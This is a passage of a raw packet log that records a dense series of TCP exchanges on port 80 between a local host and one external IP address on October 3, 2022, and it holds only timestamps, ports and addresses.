Oct 3, 2022 17:42:30.401341915 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.401341915 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.401355028 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.401365995 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.401402950 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.401405096 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.401446104 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.401448011 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.401492119 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.401498079 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.401535988 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.401542902 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.401577950 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.401580095 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.401621103 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.401622057 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.401664019 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.401665926 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.401707888 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.401707888 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.401750088 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.401751995 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.401793957 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.401796103 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.401835918 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.401880026 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.401882887 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.401895046 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.401927948 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.401930094 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.401969910 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.401979923 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.402018070 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.402025938 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.402071953 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.402079105 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.402121067 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.402123928 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.402163982 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.402167082 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.402206898 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.402208090 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.402249098 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.402251959 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.402291059 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.402295113 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.402333021 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.402337074 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.402379990 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.402380943 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.402420998 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.402440071 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.402462959 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.402477026 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.402508020 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.402515888 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.402558088 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.402561903 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.402600050 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.402600050 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.402642012 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.402662992 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.402687073 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.402726889 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.402765036 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.402765036 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.402784109 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.402826071 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.402836084 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.402837038 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.402892113 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.402936935 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.402991056 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.402996063 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.403033018 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.403037071 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.403076887 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.403089046 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.403134108 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.403134108 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.403175116 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.403177977 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.403218985 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.403218985 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.403261900 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.403265953 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.403304100 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.403306007 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.403347015 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.403357983 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.403389931 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.403395891 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.403433084 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.403439999 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.403476954 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.403486967 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.403521061 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.403522968 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.403565884 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.403577089 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.403609991 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.403610945 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.403642893 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.403671980 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.403693914 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:30.668492079 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:30.668572903 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:31.184628963 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:31.186233997 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.144378901 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.144455910 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.625495911 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.626210928 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.652718067 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.652736902 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.652755976 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.652874947 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.653106928 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.653124094 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.653142929 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.653160095 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.653172016 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.653173923 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.653184891 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.653197050 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.653204918 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.653223038 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.680131912 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.680205107 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.680254936 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.680294991 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.680305958 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.680305958 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.680310011 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.680324078 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.680357933 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.680372953 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.680372953 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.680422068 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.680424929 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.680466890 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.680471897 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.680497885 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.680537939 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.680552006 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.680567980 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.680588961 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.680597067 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.680618048 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.680627108 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.680649042 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.680655956 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.680680037 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.680685043 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.680700064 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.680713892 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.680728912 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.680742979 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.680761099 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.680773973 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.680794954 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.680811882 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.680816889 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.680841923 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.680852890 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.680883884 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.708024979 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.708070993 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.708117962 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.708117008 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.708156109 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.708162069 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.708192110 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.708198071 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.708234072 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.708240032 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.708261967 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.708282948 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.708300114 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.708323956 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.708343029 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.708364964 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.708379984 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.708406925 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.708440065 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.708458900 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.708466053 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.708492041 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.708494902 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.708515882 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.708534002 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.708539009 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.708571911 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.708590984 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.708597898 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.708622932 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.708622932 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.708651066 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.708662033 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.708676100 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.708695889 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.708702087 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.708728075 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.708739042 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.708769083 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.708770990 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.708796978 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.708817005 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.708822012 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.708846092 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.708856106 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.708870888 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.708892107 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.708895922 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.708920002 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.708931923 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.708945036 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.708964109 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.708971024 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.708996058 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.708996058 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.709022045 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.709028006 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.709047079 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.709060907 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.709072113 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.709096909 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.709100008 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.709120989 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.709146976 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.709148884 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.709172964 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.709188938 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.709198952 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.709228039 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.709266901 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.736211061 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.736244917 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.736309052 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.736318111 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.736352921 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.736392975 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.736407995 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.736454010 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.736493111 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.736507893 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.736548901 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.736589909 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.736602068 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.736646891 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.736685038 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.736701012 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.736745119 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.736783981 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.736797094 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.736841917 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.736850023 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.736880064 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.736886978 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.736932039 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.736974001 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.736985922 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.737031937 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.737076044 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.737085104 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.737123013 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.737149000 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.737150908 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.737178087 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.737188101 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.737205029 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.737212896 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.737231016 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.737236977 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.737257957 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.737303972 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.737303972 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.737330914 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.737334967 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.737358093 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.737391949 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.737395048 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.737418890 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.737426996 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.737446070 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.737449884 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.737473011 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.737483978 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.737499952 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.737508059 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.737528086 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.737530947 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.737555027 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.737560987 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.737582922 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.737585068 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.737611055 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.737620115 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.737637997 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.737656116 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.737663984 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.737678051 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.737690926 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.737703085 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.737718105 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.737726927 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.737745047 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.737752914 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.737771034 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.737780094 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.737797022 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.737803936 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.737824917 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.737829924 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.737852097 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.737859011 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.737879038 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.737884998 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.737905979 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.737909079 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.737932920 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.737968922 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.737973928 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.737998009 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.738006115 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.738024950 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.738029003 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.738053083 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.738064051 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.738080025 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.738090992 CEST	49711	80	192.168.2.6	85.31.46.167
Oct 3, 2022 17:42:32.738106966 CEST	80	49711	85.31.46.167	192.168.2.6
Oct 3, 2022 17:42:32.738117933 CEST	49711	80	192.168.2.6	85.31.46.167
